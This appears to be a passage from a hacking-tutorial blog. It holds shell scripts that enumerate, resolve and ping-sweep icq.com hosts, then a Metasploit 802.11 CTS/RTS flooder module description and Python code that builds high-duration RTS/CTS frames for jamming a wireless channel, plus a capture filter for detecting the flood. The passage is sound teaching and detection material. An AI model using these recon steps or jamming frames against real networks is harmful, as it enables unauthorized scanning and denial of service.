cat index.html | grep "href=" | cut -d'/' -f3 | grep icq.com | sort -u | cut -d'"' -f1 > domain.txt
Step 3: Find the IP address of every domain name we got from the last step. To do so we write a small bash script:
//findip.sh
#!/bin/bash
# Resolve every name in domain.txt and keep only the A-record answers
# ("x has address 1.2.3.4"); host also prints MX and alias lines.
for hostname in $(cat domain.txt); do
    host "$hostname" | awk '/has address/ {print $4}' &
done
wait
Step 4: Now find out whether these IP addresses are alive. Again we write a script, this time a ping sweep:
./findip.sh > Ipaddress.txt
//FindAlive.sh
#!/bin/bash
# One ping per address, printing the "N received" field of ping's summary.
for ipaddress in $(cat Ipaddress.txt); do
    echo "$ipaddress $(ping -c 1 "$ipaddress" | grep received | cut -d',' -f2)" &
done
wait

Now lets have look to the results:->




Wireless Hacking Part -2

Wireless CTS/RTS Flooder
This module sends 802.11 CTS/RTS frames to a specific wireless peer, using the specified source address.

Module Options
  ADDR_DST   Target MAC (e.g. 00:DE:AD:BE:EF:00)
  ADDR_SRC   Source MAC (not needed for CTS)
  CHANNEL    The initial channel (default: 11)
  DRIVER     The name of the wireless driver for lorcon (default: autodetect)
  INTERFACE  The name of the wireless interface (default: wlan0)
  NUM        Number of frames to send (default: 100)
  TYPE       Type of frame (RTS, CTS) (default: RTS)
  VERBOSE    Enable detailed status messages
  WORKSPACE  Specify the workspace for this module

Theory
RTS/CTS (Request to Send / Clear to Send) is the optional mechanism used by the 802.11 wireless networking protocol to reduce frame collisions introduced by the hidden node problem. Originally the protocol fixed the exposed node problem as well, but modern RTS/CTS includes ACKs and does not solve the exposed node problem. A node wishing to send data initiates the process by sending a Request to Send frame (RTS). The desti…
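Both the type/subtype table in "Capture Wireless Traffic" above and this module come down to the 802.11 Frame Control byte and the few fields that follow it. The following is an added example (my own code, not from the post or from the Metasploit module) that decodes the Frame Control byte into the type/subtype names tcpdump's wlan filters use, evaluates the "ignore beacons" filter from that section, and builds the raw RTS and CTS control frames the flooder transmits. MAC addresses and durations are placeholders chosen for the example; the FCS is omitted because the injection driver appends it.

```python
import struct

# Added example (mine, not from the post or the Metasploit module): decode the
# 802.11 Frame Control byte into the tcpdump "wlan" type/subtype names and
# build raw RTS/CTS control frames. FCS is left off; the driver appends it.

TYPE_NAMES = {0: "mgt", 1: "ctl", 2: "data"}
SUBTYPE_NAMES = {
    0: {0: "assoc-req", 1: "assoc-resp", 2: "reassoc-req", 3: "reassoc-resp",
        4: "probe-req", 5: "probe-resp", 8: "beacon", 9: "atim",
        10: "disassoc", 11: "auth", 12: "deauth"},
    1: {10: "ps-poll", 11: "rts", 12: "cts", 13: "ack", 14: "cf-end", 15: "cf-end-ack"},
    2: {0: "data", 1: "data-cf-ack", 2: "data-cf-poll", 3: "data-cf-ack-poll",
        4: "null", 5: "cf-ack", 6: "cf-poll", 7: "cf-ack-poll",
        8: "qos-data", 9: "qos-data-cf-ack", 10: "qos-data-cf-poll",
        11: "qos-data-cf-ack-poll", 12: "qos", 14: "qos-cf-poll", 15: "qos-cf-ack-poll"},
}


def decode_fc(fc0):
    """Frame Control byte 0: bits 0-1 version, bits 2-3 type, bits 4-7 subtype."""
    version, ftype, subtype = fc0 & 0x03, (fc0 >> 2) & 0x03, fc0 >> 4
    if version != 0:
        raise ValueError("unknown 802.11 protocol version %d" % version)
    return (TYPE_NAMES.get(ftype, "reserved"),
            SUBTYPE_NAMES.get(ftype, {}).get(subtype, "reserved-%d" % subtype))


def encode_fc(ftype, subtype):
    return (subtype << 4) | (ftype << 2)


def frame_kind(frame):
    return decode_fc(frame[0])


def keep_in_capture(frame):
    """The earlier section's filter: (mgt or ctl or data) and not beacon."""
    ftype, subtype = frame_kind(frame)
    return ftype in TYPE_NAMES.values() and not (ftype == "mgt" and subtype == "beacon")


def mac(addr):
    raw = bytes.fromhex(addr.replace(":", "").replace("-", ""))
    if len(raw) != 6:
        raise ValueError("bad MAC %r" % addr)
    return raw


def _duration(us):
    # Duration/ID: a 15-bit NAV value in microseconds; bit 15 has other meanings.
    if not 0 <= us <= 32767:
        raise ValueError("duration must be 0..32767 microseconds")
    return us


def build_rts(ra, ta, duration_us):
    """RTS = FC(2) Duration(2) RA(6) TA(6); the module's ADDR_DST/ADDR_SRC."""
    return struct.pack("<BBH", encode_fc(1, 11), 0, _duration(duration_us)) + mac(ra) + mac(ta)


def build_cts(ra, duration_us):
    """CTS = FC(2) Duration(2) RA(6). Every station that hears it sets its NAV
    to the duration and stays quiet, which is why no source MAC is needed and
    why a stream of CTS frames with a large duration denies the channel."""
    return struct.pack("<BBH", encode_fc(1, 12), 0, _duration(duration_us)) + mac(ra)


# Constructed beacon header (FC, duration, 3 addresses, sequence control) for the filter check.
BEACON = bytes([0x80, 0x00, 0, 0]) + mac("ff:ff:ff:ff:ff:ff") + mac("00:11:22:33:44:55") * 2 + b"\x00\x00"

if __name__ == "__main__":
    rts = build_rts("00:DE:AD:BE:EF:00", "00:11:22:33:44:55", 30000)
    cts = build_cts("00:DE:AD:BE:EF:00", 30000)
    for name, frame in (("beacon", BEACON), ("rts", rts), ("cts", cts)):
        print(name, frame_kind(frame), "kept:", keep_in_capture(frame), frame.hex())
```

Seen on the wire, the flood is a run of tiny ctl/cts or ctl/rts frames with a duration near the 32767 maximum, so 'wlan type ctl subtype cts' with the -e flag (to print the duration and addresses) is the capture filter to confirm it, and the fact that a CTS carries no transmitter address is why the attacker's MAC never appears in it.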